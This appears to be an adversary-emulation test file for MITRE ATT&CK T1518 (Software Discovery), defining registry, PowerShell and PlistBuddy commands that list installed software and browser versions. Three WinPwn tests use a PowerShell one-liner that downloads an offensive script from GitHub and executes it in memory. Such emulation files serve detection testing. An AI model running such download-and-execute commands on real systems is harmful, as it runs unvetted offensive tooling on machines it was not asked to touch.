attack_technique: T1518 display_name: Software Discovery atomic_tests: - name: Find and Display Internet Explorer Browser Version auto_generated_guid: 68981660-6670-47ee-a5fa-7e74806420a4 description: | Query the registry to determine the version of internet explorer installed on the system. Upon execution, version information about internet explorer will be displayed. supported_platforms: - windows executor: command: | reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion name: command_prompt - name: Applications Installed auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b description: | Query the registry to determine software and versions installed on the system. Upon execution a table of software name and version information will be displayed. supported_platforms: - windows executor: command: | Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize name: powershell - name: Find and Display Safari Browser Version auto_generated_guid: 103d6533-fd2a-4d08-976a-4a598565280f description: | Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors supported_platforms: - macos executor: name: sh elevation_required: false command: | /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist - name: WinPwn - Dotnetsearch auto_generated_guid: 7e79a1b6-519e-433c-ad55-3ff293667101 description: Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn supported_platforms: - windows executor: command: |- iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') Dotnetsearch -noninteractive -consoleoutput name: powershell - name: WinPwn - DotNet auto_generated_guid: 10ba02d0-ab76-4f80-940d-451633f24c5b description: Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn. supported_platforms: - windows executor: command: |- iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') dotnet -consoleoutput -noninteractive name: powershell - name: WinPwn - powerSQL auto_generated_guid: 0bb64470-582a-4155-bde2-d6003a95ed34 description: Start PowerUpSQL Checks using powerSQL function of WinPwn supported_platforms: - windows executor: command: |- iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') powerSQL -noninteractive -consoleoutput name: powershell